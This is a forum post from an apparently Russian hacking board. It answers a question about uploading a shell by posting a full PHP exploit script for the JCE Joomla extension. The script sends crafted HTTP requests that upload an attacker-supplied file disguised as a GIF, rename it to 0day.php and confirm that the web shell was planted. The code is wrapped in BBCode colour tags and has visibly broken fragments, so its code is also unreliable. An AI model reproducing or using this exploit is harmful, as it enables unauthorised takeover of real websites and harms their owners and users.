|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от alextret
А если права Editor или Publisher можно как нибудь шелл залить?
попробуй воспользоваться вот этим сплоитом:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"] 7.5
# Coded By: Mostafa Azizi
###################################################################################################
[/COLOR][COLOR="#0000BB"]error_reporting[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"max_execution_time"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]ini_set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"default_socket_timeout"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]ob_implicit_flush[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]'
JCE Joomla Extension Remote File Upload
JCE Joomla Extension Remote File Upload
hostname (ex:www.sitename.com): *
path (ex: /joomla/ or just / ): *
Please specify a file to upload: *
specify a port (default is 80):
Proxy (ip:port):
* fields are required
'[/COLOR][COLOR="#007700"];
function[/COLOR][COLOR="#0000BB"]sendpacket[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$output[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$proxy_regex[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'[/COLOR][COLOR="#007700"];
global[/COLOR][COLOR="#0000BB"]$proxy[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pass[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$proxy[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fsockopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]stream_set_timeout[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]);
if (![/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"])
{
echo[/COLOR][COLOR="#DD0000"]' No response from '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]htmlentities[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]' ...
'[/COLOR][COLOR="#007700"];
die;
}
} else
{
[/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]':'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$proxy[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]'Connecting to proxy: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]':'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]' ...
'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fsockopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$parts[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]stream_set_timeout[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"]);
if (![/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"])
{
echo[/COLOR][COLOR="#DD0000"]'No response from proxy...
'[/COLOR][COLOR="#007700"];
die;
}
}
[/COLOR][COLOR="#0000BB"]fputs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
{
if ([/COLOR][COLOR="#0000BB"]$proxy[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
while (![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"]);
}
} else
{
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
while ((![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"])) or (![/COLOR][COLOR="#0000BB"]eregi[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x0d[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x0a[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x0d[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x0a[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"])))
{
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]fread[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
}
}
} else[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ock[/COLOR][COLOR="#007700"]);
if ([/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$output[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) echo[/COLOR][COLOR="#0000BB"]nl2br[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]htmlentities[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"]));
if ([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]nl2br[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]htmlentities[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]'2.0.11Target patched.
"[/COLOR][COLOR="#007700"];
die();
}
}
if ([/COLOR][COLOR="#0000BB"]$count[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]) echo[/COLOR][COLOR="#DD0000"]'Target is exploitable.
'[/COLOR][COLOR="#007700"];
}
}
[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'host'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'port'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$proxy[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'proxy'[/COLOR][COLOR="#007700"]];
if (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Submit'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#007700"]));
if ([/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]80[/COLOR][COLOR="#007700"];}
if (([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]<>[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"]) or ([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"])-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]<>[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"])) {die([/COLOR][COLOR="#DD0000"]'Error... check the path!'[/COLOR][COLOR="#007700"]);}
if ([/COLOR][COLOR="#0000BB"]$proxy[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"];} else {[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]':'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$port[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"];}
[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]/* Packet 1 --> Checking Exploitability */
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"GET "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Host: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]sendpacket[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]/* Packet 2 --> Uploading shell as a gif file */
[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"GIF89a1\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'datafile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"-----------------------------41184676334\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"/\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"-----------------------------41184676334\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: application/octet-stream\r\n\r\n\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"-----------------------------41184676334\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"0\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"-----------------------------41184676334\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Disposition: form-data; name=\"Filedata\"; filename=\"0day.gif\"\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: image/gif\r\n\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$content[/COLOR][COLOR="#DD0000"]\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"-----------------------------41184676334\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"0day\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"-----------------------------41184676334\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Disposition: form-data; name=\"action\"\r\n\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"upload\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"-----------------------------41184676334--\r\n\r\n\r\n\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"POST "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Host: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"User-Agent: BOT/0.1 (BOT for JCE)\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Accept-Language: en-us,en;q=0.5\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Connection: Close\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Proxy-Connection: close\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Length: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\r\n\r\n\r\n\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]sendpacket[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]/* Packet 3 --> Change Extension from .gif to .php */
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"POST "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Host: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"User-Agent: BOT/0.1 (BOT for JCE) \r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Accept-Language: en-US,en;q=0.8\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Accept-Encoding: deflate\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"X-Request: JSON\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$ren[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"json={\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"0day.php\"]}"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Content-Length: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ren[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"\r\n\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$ren[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]sendpacket[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]/* Packet 4 --> Check for successfully uploaded */
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Head "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/images/stories/0day.php HTTP/1.1\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"Host: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]sendpacket[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$packet[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
